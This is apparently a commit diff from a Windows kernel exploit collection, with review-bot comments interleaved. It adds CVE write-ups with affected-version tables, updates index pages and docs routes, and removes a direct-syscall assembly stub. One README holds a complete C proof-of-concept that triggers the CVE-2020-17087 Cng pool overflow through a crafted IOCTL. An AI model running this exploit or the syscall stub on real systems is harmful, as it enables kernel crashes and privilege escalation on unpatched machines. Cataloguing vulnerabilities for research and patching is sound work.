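Review bot: this deletes the whole project file, but of the sources it lists only the `syscall_x64.asm` and `syscall_x64.h` removals are visible in this commit; confirm that `exp.cpp`, `stdafx.cpp`, `exp.h` and `targetver.h` from the `<ClCompile>`/`<ClInclude>` groups are removed or moved as well, otherwise they are left orphaned without any build configuration. Note also that the `<MASM>` item was only enabled for the `x64` configurations while the `Win32` configurations still compiled `exp.cpp` against `syscall_x64.h`, which is another reason the project as a whole rather than single files is being dropped.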

View File

@@ -1,44 +0,0 @@
<?xml version="1.0" encoding="utf-8"?>
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup>
<Filter Include="소스 파일">
<UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>
<Extensions>cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx</Extensions>
</Filter>
<Filter Include="헤더 파일">
<UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>
<Extensions>h;hh;hpp;hxx;hm;inl;inc;ipp;xsd</Extensions>
</Filter>
<Filter Include="리소스 파일">
<UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>
<Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>
</Filter>
</ItemGroup>
<ItemGroup>
<ClInclude Include="stdafx.h">
<Filter>헤더 파일</Filter>
</ClInclude>
<ClInclude Include="targetver.h">
<Filter>헤더 파일</Filter>
</ClInclude>
<ClInclude Include="syscall_x64.h">
<Filter>소스 파일</Filter>
</ClInclude>
<ClInclude Include="exp.h">
<Filter>헤더 파일</Filter>
</ClInclude>
</ItemGroup>
<ItemGroup>
<ClCompile Include="stdafx.cpp">
<Filter>소스 파일</Filter>
</ClCompile>
<ClCompile Include="exp.cpp">
<Filter>소스 파일</Filter>
</ClCompile>
</ItemGroup>
<ItemGroup>
<MASM Include="syscall_x64.asm">
<Filter>소스 파일</Filter>
</MASM>
</ItemGroup>
</Project>

View File

@@ -1,4 +0,0 @@
<?xml version="1.0" encoding="utf-8"?>
<Project ToolsVersion="15.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<PropertyGroup />
</Project>

View File

@@ -1,15 +0,0 @@
public _DoSyscall
.code
_DoSyscall proc
mov r10, rcx
mov rax, [rsp + 40]
add rsp, 16
syscall
sub rsp, 16
ret
_DoSyscall endp
end

View File

@@ -1,15 +0,0 @@
#pragma once
#include <cstdint>
extern "C" void _DoSyscall();
extern "C" void _GetKernelCallbackTb(PDWORD CallbackTb);
template< typename ReturnType = void, typename... Args,
typename T1 = void*, typename T2 = void*, typename T3 = void*, typename T4 = void* >
ReturnType Syscall(const uint64_t Index, T1 A1 = {}, T2 A2 = {}, T3 A3 = {}, T4 A4 = {}, Args... Arguments)
{
static_assert(sizeof(void*) == 8, "Only x64 is supported.");
return reinterpret_cast< ReturnType(*)(T1, T2, T3, T4, uint64_t, uint64_t, Args...) >(_DoSyscall)(
A1, A2, A3, A4, Index, 0, Arguments... // Stack must be aligned to 16 byte boundary.
);
}
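Review bot: `extern "C" void _GetKernelCallbackTb(PDWORD CallbackTb);` declares a symbol that the accompanying `syscall_x64.asm` never defines (it only exports `_DoSyscall`), so any caller would fail at link time; either drop the declaration or add the routine. The header also uses `PDWORD` while including only `<cstdint>`, so it silently depends on `<windows.h>` having been included earlier; include it explicitly or use `uint32_t*` to keep the header self-contained.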

View File

@@ -0,0 +1,118 @@
### CVE-2020-17087
#### Describe
Windows Kernel Local Elevation of Privilege Vulnerability
#### ImpactVersion
| Product | CPU Architecture | Version | Update | Tested |
| :------------------ | :--------------- | ------- | ------ | ------ |
| Windows Server 2019 | | | | |
| Windows Server 2012 | | R2 | | |
| Windows Server 2012 | | | | |
| Windows Server 2008 | X64 | R2 | SP1 | |
| Windows Server 2008 | X86/X64 | | SP2 | |
| Windows RT 8.1 | | | | |
| Windows 8.1 | X86/X64 | | | |
| Windows 7 | X86/X64 | | SP1 | |
| Windows Server 2016 | | | | |
| Windows 10 | X86/X64 | 1607 | | |
| Windows 10 | | | | |
| Windows 10 | X86/X64/ARM64 | 20H2 | | |
| Windows 10 | X86/X64/ARM64 | 2004 | | |
| Windows 10 | X86/X64/ARM64 | 1903 | | |
| Windows 10 | X86/X64/ARM64 | 1909 | | |
| Windows 10 | X86/X64/ARM64 | 1809 | | |
| Windows 10 | X86/X64/ARM64 | 1803 | | |
| Windows Server | | 20H2 | | |
| Windows Server | | 2004 | | |
| Windows Server | | 1903 | | |
| Windows Server | | 1909 | | |
#### Patch
```
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17087
```
#### Utilization
```
#pragma comment(lib, "ntdll")
#include <cstdio>
#include <windows.h>
int main() {
HANDLE hCng = CreateFileA("\\\\.\\GLOBALROOT\\Device\\Cng",
GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, 0, NULL);
if (hCng == NULL) {
printf("[-] Failed to open \\Device\\Cng: %u\n", GetLastError());
return 1;
}
printf("[+] \\Device\\Cng opened, handle: %p\n", hCng);
//
// DataBufferSize overflows when used for allocating memory in
// cng!CfgAdtpFormatPropertyBlock as (uint16)(DataBufferSize * 6).
//
// In this proof-of-concept, an allocation of (uint16)(0x2AAB * 6) = 2
// bytes is requested while 0x2AAB * 6 = 0x10002 bytes are written to it.
//
CONST DWORD DataBufferSize = 0x2AAB;
CONST DWORD IoctlSize = 4096 + DataBufferSize;
BYTE *IoctlData = (BYTE *)HeapAlloc(GetProcessHeap(), 0, IoctlSize);
RtlZeroMemory(IoctlData, IoctlSize);
*(DWORD*) &IoctlData[0x00] = 0x1A2B3C4D;
*(DWORD*) &IoctlData[0x04] = 0x10400;
*(DWORD*) &IoctlData[0x08] = 1;
*(ULONGLONG*)&IoctlData[0x10] = 0x100;
*(DWORD*) &IoctlData[0x18] = 3;
*(ULONGLONG*)&IoctlData[0x20] = 0x200;
*(ULONGLONG*)&IoctlData[0x28] = 0x300;
*(ULONGLONG*)&IoctlData[0x30] = 0x400;
*(DWORD*) &IoctlData[0x38] = 0;
*(ULONGLONG*)&IoctlData[0x40] = 0x500;
*(ULONGLONG*)&IoctlData[0x48] = 0x600;
*(DWORD*) &IoctlData[0x50] = DataBufferSize; // OVERFLOW
*(ULONGLONG*)&IoctlData[0x58] = 0x1000;
*(ULONGLONG*)&IoctlData[0x60] = 0;
RtlCopyMemory(&IoctlData[0x200], L"FUNCTION", 0x12);
RtlCopyMemory(&IoctlData[0x400], L"PROPERTY", 0x12);
ULONG_PTR OutputBuffer = 0;
DWORD BytesReturned;
BOOL Status = DeviceIoControl(
hCng,
0x390400,
IoctlData,
IoctlSize,
&OutputBuffer,
sizeof(OutputBuffer),
&BytesReturned,
NULL
);
printf("[+] Ioctl sent, Status: %d, OutputBuffer: %zx\n", Status, OutputBuffer);
HeapFree(GetProcessHeap(), 0, IoctlData);
CloseHandle(hCng);
return 0;
}
```
#### Analyse
- https://blog.csdn.net/weixin_43815930/article/details/114123728
- https://www.anquanke.com/post/id/221964
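Review bot: in the Utilization block, `CreateFileA` reports failure with `INVALID_HANDLE_VALUE`, not `NULL`, so `if (hCng == NULL)` never fires and the code goes on to call `DeviceIoControl` on an invalid handle whenever `\Device\Cng` cannot be opened; change the check to `if (hCng == INVALID_HANDLE_VALUE)`. The `Tested` column of the ImpactVersion table is empty for every row, so the page does not say whether this code was ever run on any listed build; fill it in or state plainly that it is untested.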

View File

@@ -0,0 +1,41 @@
### CVE-2021-1709
#### Describe
Windows Win32k Elevation of Privilege Vulnerability
#### ImpactVersion
| Product | CPU Architecture | Version | Update | Tested |
| :------------------ | :--------------- | ------- | ------ | ------ |
| Windows Server | | 20H2 | | |
| Windows Server | | 2004 | | |
| Windows Server | | 1909 | | |
| Windows Server 2019 | | | | |
| Windows Server 2016 | | | | |
| Windows Server 2012 | | R2 | | |
| Windows Server 2012 | | | | |
| Windows Server 2008 | X86/X64 | | SP2 | |
| Windows Server 2008 | X64 | R2 | | |
| Windows RT 8.1 | | | | |
| Windows 7 | X86/X64 | | SP1 | |
| Windows 10 | X86/X64 | | | |
| Windows 10 | X86/X64/ARM64 | 20H2 | | |
| Windows 10 | X86/X64/ARM64 | 2004 | | |
| Windows 10 | X86/X64/ARM64 | 1909 | | |
| Windows 10 | X86/X64/ARM64 | 1809 | | |
| Windows 10 | X86/X64/ARM64 | 1803 | | |
| Windows 10 | X86/X64 | 1607 | | |
#### Patch
```
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1709
```
#### Utilization
- None

Binary file not shown.

View File

@@ -0,0 +1,28 @@
### CVE-2021-31166
#### 描述
HTTP Protocol Stack Remote Code Execution Vulnerability
#### 影响版本
| Product | CPU Architecture | Version | Update | Tested |
| -------------- | ---------------- | ------- | ------ | ------ |
| Windows 10 | x86/x64/arm64 | 2004 | | |
| Windows 10 | x86/x64/arm64 | 20H2 | | |
| Windows Server | | 2004 | | |
| Windows Server | | 20H2 | | |
#### 修复补丁
```
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-43224
```
#### 利用方式
该漏洞并未进行测试,根目录留存着网络收集**[CVE编号].zip**的EXP或者POC代码状态未知
#### 项目来源
- [0vercl0k](https://github.com/0vercl0k/CVE-2021-31166)
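Review bot: the `修复补丁` link points at the advisory for CVE-2021-43224 (`.../security-guidance/advisory/CVE-2021-43224`) instead of CVE-2021-31166; the English README for the same CVE in this commit uses the correct `.../advisory/CVE-2021-31166` URL, so this looks like a copy-paste leftover from the CVE-2021-43224 entry and should be corrected.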

View File

@@ -0,0 +1,29 @@
### CVE-2021-31166
#### Describe
HTTP Protocol Stack Remote Code Execution Vulnerability
#### ImpactVersion
| Product | CPU Architecture | Version | Update | Tested |
| -------------- | ---------------- | ------- | ------ | ------ |
| Windows 10 | x86/x64/arm64 | 2004 | | |
| Windows 10 | x86/x64/arm64 | 20H2 | | |
| Windows Server | | 2004 | | |
| Windows Server | | 20H2 | | |
#### Patch
```
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-31166
```
#### Utilization
The vulnerability does not test, the root directory is stored in the network collection **[CVE number] .zip** EXP or POC, code status unknown
#### ProjectSource
- [0vercl0k](https://github.com/0vercl0k/CVE-2021-31166)
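Review bot: the Utilization sentence is hard to parse ("The vulnerability does not test, the root directory is stored in the network collection ..."); suggest `This vulnerability has not been tested; the repository root keeps a network-collected **[CVE number].zip** EXP/PoC whose code status is unknown.` so it says the same thing as the Chinese README. The blank `Tested` column is consistent with that statement and can stay.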

View File

@@ -2,6 +2,7 @@
| :--------------------------------------------- | :----------------------------------------------------------: | :-------------------------------------------------: |
| [CVE-2021-43224](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2021-43224) | Windows Common Log File | Windows 7/8/10/11/2008/2012/2016/2019/2022/Server |
| [CVE-2021-34527](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2021-34527) | Windows Print Spooler Remote Code Execution | Windows 7/8/10/2008/2012/2016/2019/2022/Server |
| [CVE-2021-31166](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2021-31166) | HTTP Protocol Stack | Windows 10/Server |
| [CVE-2021-21551](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2021-21551) | None | None |
| [CVE-2021-1709](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2021-1709) | Windows Win32k | Windows 7/8.1/10/2008/2012/2016/2019/Server |
| [CVE-2020-17087](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2020-17087) | Windows Kernel Local Elevation | Windows 7/8.1/10/2008/2012/2016/2019/Server |
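Review bot: the new CVE-2021-31166 row describes it only as `HTTP Protocol Stack`, while neighbouring rows spell out the impact (`Windows Print Spooler Remote Code Execution`, `Windows Kernel Local Elevation`) and the CVE's own README in this commit calls it `HTTP Protocol Stack Remote Code Execution Vulnerability`; use `HTTP Protocol Stack Remote Code Execution` so the index distinguishes it from the local elevation entries around it.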
@@ -21,7 +22,6 @@
| [CVE-2019-0708](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2019-0708) | Remote Desktop Services | Windows 7/2008 |
| [CVE-2018-8440](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2018-8440) | Windows ALPC Elevation | Windows 7/8/10/2008/2012/2016 |
| [CVE-2018-1038](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2018-1038) | Windows Kernel Elevation | Windows 7/2008 |
| [CVE-2018-0743](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2018-0743) | Windows Subsystem for Linux Elevation | Windows 10/2016 |
| [CVE-2018-0886](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2018-0886) | CredSSP Remote Code Execution | Windows 7/8/10/2008/2012/2016/2019/Server |
| [CVE-2018-0824](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2018-0824) | COM for Windows Remote Code Execution | Windows 7/8/10/2008/2012/2016/Server |
| [CVE-2017-11783](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2017-11783) | Windows Elevation | Windows 8/10/2012/2016 |

View File

@@ -290,9 +290,6 @@ let config = {
{
path: '/CN/CVE-2017-8465', source: 'https://raw.githubusercontent.com/Ascotbe/Kernelhub/master/TestFailure/CVE-2017-8465/README.md'
},
{
path: '/CN/CVE-2018-0743', source: 'https://raw.githubusercontent.com/Ascotbe/Kernelhub/master/TestFailure/CVE-2018-0743/README.md'
},
{
path: '/CN/CVE-2018-0824', source: 'https://raw.githubusercontent.com/Ascotbe/Kernelhub/master/TestFailure/CVE-2018-0824/README.md'
},
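Review bot: removing the `/CN/CVE-2018-0743` route turns every existing link to that page (including the row this commit deletes from the CN index) into a dead route on the docs site; if `TestFailure/CVE-2018-0743/README.md` still exists, keep the route, otherwise add a redirect or a short stub page so old bookmarks do not 404. The same applies to the matching `/EN/CVE-2018-0743` removal later in this commit.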
@@ -356,6 +353,9 @@ let config = {
{
path: '/CN/CVE-2021-21551', source: 'https://raw.githubusercontent.com/Ascotbe/Kernelhub/master/TestFailure/CVE-2021-21551/README.md'
},
{
path: '/CN/CVE-2021-31166', source: 'https://raw.githubusercontent.com/Ascotbe/Kernelhub/master/TestFailure/CVE-2021-31166/README.md'
},
{
path: '/CN/CVE-2021-34527', source: 'https://raw.githubusercontent.com/Ascotbe/Kernelhub/master/TestFailure/CVE-2021-34527/README.md'
},

View File

@@ -2,6 +2,7 @@
| :--------------------------------------------- | :----------------------------------------------------------: | :-------------------------------------------------: |
| [CVE-2021-43224](http://kernelhub.ascotbe.com/EnglishDocs/#/EN/CVE-2021-43224) | Windows Common Log File | Windows 7/8/10/11/2008/2012/2016/2019/2022/Server |
| [CVE-2021-34527](http://kernelhub.ascotbe.com/EnglishDocs/#/EN/CVE-2021-34527) | Windows Print Spooler Remote Code Execution | Windows 7/8/10/2008/2012/2016/2019/2022/Server |
| [CVE-2021-31166](http://kernelhub.ascotbe.com/EnglishDocs/#/EN/CVE-2021-31166) | HTTP Protocol Stack | Windows 10/Server |
| [CVE-2021-21551](http://kernelhub.ascotbe.com/EnglishDocs/#/EN/CVE-2021-21551) | None | None |
| [CVE-2021-1709](http://kernelhub.ascotbe.com/EnglishDocs/#/EN/CVE-2021-1709) | Windows Win32k | Windows 7/8.1/10/2008/2012/2016/2019/Server |
| [CVE-2020-17087](http://kernelhub.ascotbe.com/EnglishDocs/#/EN/CVE-2020-17087) | Windows Kernel Local Elevation | Windows 7/8.1/10/2008/2012/2016/2019/Server |
@@ -21,7 +22,6 @@
| [CVE-2019-0708](http://kernelhub.ascotbe.com/EnglishDocs/#/EN/CVE-2019-0708) | Remote Desktop Services | Windows 7/2008 |
| [CVE-2018-8440](http://kernelhub.ascotbe.com/EnglishDocs/#/EN/CVE-2018-8440) | Windows ALPC Elevation | Windows 7/8/10/2008/2012/2016 |
| [CVE-2018-1038](http://kernelhub.ascotbe.com/EnglishDocs/#/EN/CVE-2018-1038) | Windows Kernel Elevation | Windows 7/2008 |
| [CVE-2018-0743](http://kernelhub.ascotbe.com/EnglishDocs/#/EN/CVE-2018-0743) | Windows Subsystem for Linux Elevation | Windows 10/2016 |
| [CVE-2018-0886](http://kernelhub.ascotbe.com/EnglishDocs/#/EN/CVE-2018-0886) | CredSSP Remote Code Execution | Windows 7/8/10/2008/2012/2016/2019/Server |
| [CVE-2018-0824](http://kernelhub.ascotbe.com/EnglishDocs/#/EN/CVE-2018-0824) | COM for Windows Remote Code Execution | Windows 7/8/10/2008/2012/2016/Server |
| [CVE-2017-11783](http://kernelhub.ascotbe.com/EnglishDocs/#/EN/CVE-2017-11783) | Windows Elevation | Windows 8/10/2012/2016 |

View File

@@ -290,9 +290,6 @@ let config = {
{
path: '/EN/CVE-2017-8465', source: 'https://raw.githubusercontent.com/Ascotbe/Kernelhub/master/TestFailure/CVE-2017-8465/README_EN.md'
},
{
path: '/EN/CVE-2018-0743', source: 'https://raw.githubusercontent.com/Ascotbe/Kernelhub/master/TestFailure/CVE-2018-0743/README_EN.md'
},
{
path: '/EN/CVE-2018-0824', source: 'https://raw.githubusercontent.com/Ascotbe/Kernelhub/master/TestFailure/CVE-2018-0824/README_EN.md'
},
@@ -356,6 +353,9 @@ let config = {
{
path: '/EN/CVE-2021-21551', source: 'https://raw.githubusercontent.com/Ascotbe/Kernelhub/master/TestFailure/CVE-2021-21551/README_EN.md'
},
{
path: '/EN/CVE-2021-31166', source: 'https://raw.githubusercontent.com/Ascotbe/Kernelhub/master/TestFailure/CVE-2021-31166/README_EN.md'
},
{
path: '/EN/CVE-2021-34527', source: 'https://raw.githubusercontent.com/Ascotbe/Kernelhub/master/TestFailure/CVE-2021-34527/README_EN.md'
},